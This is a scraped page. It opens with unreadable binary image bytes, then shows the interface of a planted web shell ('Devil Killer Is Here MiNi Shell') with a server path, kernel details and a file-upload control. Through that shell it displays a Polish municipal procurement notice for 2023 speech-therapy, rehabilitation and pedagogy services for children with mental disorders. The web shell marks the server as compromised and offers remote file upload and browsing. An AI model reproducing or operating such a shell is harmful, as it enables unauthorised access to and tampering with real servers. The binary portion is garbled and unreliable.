JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230116/0003550201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie w 2023 r. specjalistycznych usług opiekuńczych dla dzieci z zaburzeniami psychicznymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINNY OŚRODEK POMOCY SPOŁECZNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 850019464</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">642</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skrzyszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-156</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">14 68 87 017</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gops@skrzyszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gopsskrzyszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie w 2023 r. specjalistycznych usług opiekuńczych dla dzieci z zaburzeniami psychicznymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7677c5fb-9595-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00035502</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034518/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie w 2023 r. specjalistycznych usług opiekuńczych dla dzieci z zaburzeniami psychicznymi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7677c5fb-9595-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl. <br/>2.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres email: gops@skrzyszow.pl (Uwaga! Nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego (zwanym dalej: „rozporządzeniem w sprawie środków komunikacji elektronicznej”), Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy e-Zamówienia: <br/>1)	Komputer PC: <br/>a)	parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD,<br/>b) zainstalowany jeden z systemów operacyjnych: MS Windows 7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04, <br/>c) zainstalowana jedna z przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge 14.0 i nowsze; <br/>albo <br/>2)	Tablet/Telefon:<br/>a)	parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3, <br/>b) przeglądarka Chrome 61 lub nowa.<br/>	Uwaga: Szczegółowe minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO informuję, że:<br/>1)	Administratorem Pani/Pana danych osobowych jest Gminny Ośrodek Pomocy Społecznej w Skrzyszowie, 33- 156 Skrzyszów 642,<br/>2)	kontakt z inspektorem ochrony danych osobowych w Gminnym Ośrodku Pomocy Społecznej w Skrzyszowie pod adresem: gops@skrzyszow.pl lub na adres wskazany w pkt 1, <br/>3)	Pani/ Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego prowadzonego w trybie podstawowym, <br/>4)	dane osobowe mogą zostać ujawnione właściwym organom oraz podmiotom (w tym Wykonawcom oraz każdemu kto jest zainteresowany zgodnie z zasadą jawności postępowania), upoważnionym zgodnie z obowiązującym prawem,<br/>5)	Pani/ Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Prawa zamówień publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym określonym w przepisach Prawa zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Prawa zamówień publicznych, <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO, <br/>8)	posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/ Pana dotyczących,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia swoich danych osobowych , <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/ Pana dotyczących narusza przepisy RODO, <br/>9)	nie przysługuje Pani/ Panu: <br/>a)	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych, <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/ Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.4222.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie I: <br/>Usługi specjalistyczne dla jednego dziecka, tj.: <br/>1)	usługi logopedyczne: usprawnienie zaburzonych funkcji organizmu poprzez współpracę ze specjalistami w zakresie wspierania edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej z usług - tj. terapię logopedyczną. Usługi logopedyczne obejmują w szczególności wspomaganie dziecka, u którego zaburzenia mowy i komunikacji wynikają z uszkodzenia lub dysfunkcji centralnego układu nerwowego, zaburzeń głosu lub chorób psychicznych. Zadaniem logopedy jest w szczególności wsparcie codziennego funkcjonowania osoby, poprzez usprawnienie porozumiewania się z otoczeniem, <br/>2)	usługi rehabilitacyjne - rehabilitacja fizyczna i usprawniająca zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych - zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej bądź fizjoterapeuty. <br/><br/>W okresie realizacji zamówienia usługi świadczone będą dla jednego dziecka. Przewidywana liczba godzin usług wynosi - w przypadku usług logopedycznych - 8 godzin tygodniowo ( tj. około 384 godzin w okresie realizacji zamówienia), w przypadku usług rehabilitacyjnych - 8 godzin tygodniowo (około 384 godzin w okresie realizacji zamówienia). Łączna liczba godzin - ok. 768. <br/>Usługi będą świadczone w okresie od dnia zawarcia umowy - jednak nie wcześniej niż od dnia 1 lutego 2023 r. - do 31 grudnia 2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">9.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Prawa zamówień publicznych w wysokości nie większej niż 30% zamówienia podstawowego (w przypadku każdej części zamówienia). Zamówienia polegać będą na powtórzeniu podobnych usług co zamówienie podstawowe i będą zgodne z przedmiotem zamówienia podstawowego, tj. objętym niniejszym postępowaniem i opisanym w Rozdziale II Specyfikacji Warunków Zamówienia. Warunkiem udzielenia zamówień będzie przeprowadzenie negocjacji z wybranym Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie II: <br/>Usługi specjalistyczne dla jednego dziecka, tj.: <br/>1)	usługi logopedyczne: usprawnienie zaburzonych funkcji organizmu poprzez współpracę ze specjalistami w zakresie wspierania edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej z usług – tj. terapię logopedyczną. Usługi logopedyczne obejmują w szczególności wspomaganie dziecka, u którego zaburzenia mowy i komunikacji wynikają z uszkodzenia lub dysfunkcji centralnego układu nerwowego, zaburzeń głosu lub chorób psychicznych. Zadaniem logopedy jest w szczególności wsparcie codziennego funkcjonowania osoby, poprzez usprawnienie porozumiewania się z otoczeniem, <br/>2)	usługi rehabilitacyjne - rehabilitacja fizyczna i usprawniająca zaburzonych funkcji (rehabilitacja ruchowa) organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych - zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej bądź fizjoterapeuty<br/><br/><br/>W okresie realizacji zamówienia usługi świadczone będą dla jednego dziecka. Przewidywana liczba godzin usług wynosi: w przypadku usług logopedycznych - 8 godzin tygodniowo (tj. około 384 godzin w okresie realizacji zamówienia), w przypadku usług rehabilitacyjnych - 12 godzin tygodniowo (około 576 godzin w okresie realizacji zamówienia). Łączna liczba godzin - ok. 960.<br/>Usługi będą świadczone w okresie od dnia zawarcia umowy - jednak nie wcześniej niż od dnia 1 lutego 2023 r. - do 31 grudnia 2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">9.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Prawa zamówień publicznych w wysokości nie większej niż 30% zamówienia podstawowego (w przypadku każdej części zamówienia). Zamówienia polegać będą na powtórzeniu podobnych usług co zamówienie podstawowe i będą zgodne z przedmiotem zamówienia podstawowego, tj. objętym niniejszym postępowaniem i opisanym w Rozdziale II Specyfikacji Warunków Zamówienia. Warunkiem udzielenia zamówień będzie przeprowadzenie negocjacji z wybranym Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie III: <br/>Usługi specjalistyczne dla jednego dziecka: <br/>1)	usługi logopedyczne: usprawnienie zaburzonych funkcji organizmu poprzez współpracę ze specjalistami w zakresie wspierania edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej z usług - tj. terapię logopedyczną. Usługi logopedyczne obejmują w szczególności wspomaganie dziecka, u którego zaburzenia mowy i komunikacji wynikają z uszkodzenia lub dysfunkcji centralnego układu nerwowego, zaburzeń głosu lub chorób psychicznych. Zadaniem logopedy jest w szczególności wsparcie codziennego funkcjonowania osoby, poprzez usprawnienie porozumiewania się z otoczeniem, <br/>2)	usługi świadczone przez pedagoga – obejmujące następujące czynności: usprawnienie zaburzonych funkcji organizmu poprzez współpracę ze specjalistą w zakresie wspierania psychologiczno – pedagogicznego i edukacyjno – terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej z usług (zajęcia pedagogiczne).<br/><br/>W okresie realizacji zamówienia usługi świadczone będą dla jednego dziecka. Przewidywana liczba godzin usług wynosi: w przypadku usług logopedycznych - 13 godzin tygodniowo ( tj. około 624 godzin w okresie realizacji zamówienia), w przypadku zajęć pedagogicznych - 4 godziny tygodniowo (około 192 godzin w okresie realizacji zamówienia). Łączna liczba godzin – ok. 816.<br/>Usługi będą świadczone w okresie od dnia zawarcia umowy - jednak nie wcześniej niż od dnia 1 lutego 2023 r. - do 31 grudnia 2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">9.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Prawa zamówień publicznych w wysokości nie większej niż 30% zamówienia podstawowego (w przypadku każdej części zamówienia). Zamówienia polegać będą na powtórzeniu podobnych usług co zamówienie podstawowe i będą zgodne z przedmiotem zamówienia podstawowego, tj. objętym niniejszym postępowaniem i opisanym w Rozdziale II Specyfikacji Warunków Zamówienia. Warunkiem udzielenia zamówień będzie przeprowadzenie negocjacji z wybranym Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób, które będą uczestniczyć w wykonywaniu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu 